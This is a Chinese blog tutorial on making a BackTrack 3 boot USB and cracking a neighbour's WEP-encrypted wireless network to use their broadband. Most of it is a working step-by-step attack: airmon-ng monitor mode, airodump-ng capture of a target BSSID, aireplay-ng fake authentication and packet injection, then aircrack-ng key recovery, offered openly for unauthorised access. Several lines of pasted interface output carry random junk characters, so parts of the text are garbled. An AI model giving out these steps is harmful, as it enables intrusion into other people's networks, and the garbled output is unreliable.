BT3破解教程(USB) 破解无线路由密码
BT3就是linux的一种,好比REDLINUX,好比红旗LINUX。不过这个BT3集成了大量的黑客工具,尤以破无线网的工具而出名。
你想破人家WEB或WPA加了密的无线网,蹭网上宽带,你就不妨研究一下这个,很有意思的。
而且现在的BT2下破解WEB发展到了:几分钟就可以攻破,就算,只有AP在工作,对方客户端没有联入也照样可以破的程度了。
进虚拟机的全屏方式.
引导成功后,输用户名:root 密码: toor
再输flux进窗口模式下.
右键单击桌面任何位置,在右键菜单中选xterm开一控制台窗口
输命令:ifconfig -a 回车
如果有一个名为:rausb0的网卡设备,表名你的设备支持抓抱破解.
各位试试看.
一、先开始制作启动U盘:将下载好的backtrack3(BT3) usb版 。把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg"
二、之后重启 windows 进入BIOS设置,把BIOS里的frist boot device设置为USB-HDD(或者是USB--ZIP)再重启选择从usb启动。系统进入backtrack3 系统。
三、现在开始破解
1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/
Retry:off RTS thr:off Fragment thr:off
Encryption key:off \Xr\Db`
Power Management:off i)l3_h.Q
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm $ XKB AUYj
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 46g K
"
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 dVbb‑|!Sk
2.找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息: uw#G1v/
lo no wireless extensions. 'dChQhG}
eth0 no wireless extensions. Cx> $%|D
eth1 IEEE 802.11g ESSID:"" Nickname:"" J 1]f GRLJ
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 BwV @*0
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 ,+?B8.-%
Retry:off RTS thr:off Fragment thr:off G=("""wZ
Encryption key:off q::D?T1^
Power Management:off [$b7Jkp"9
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm ]uJ%VZs\
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 .P?Bz
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 V6E@Dkx7
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1. tB:_8zP8
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址
5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1 ONQB%YC
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解
来源:Chinadu`s Blog
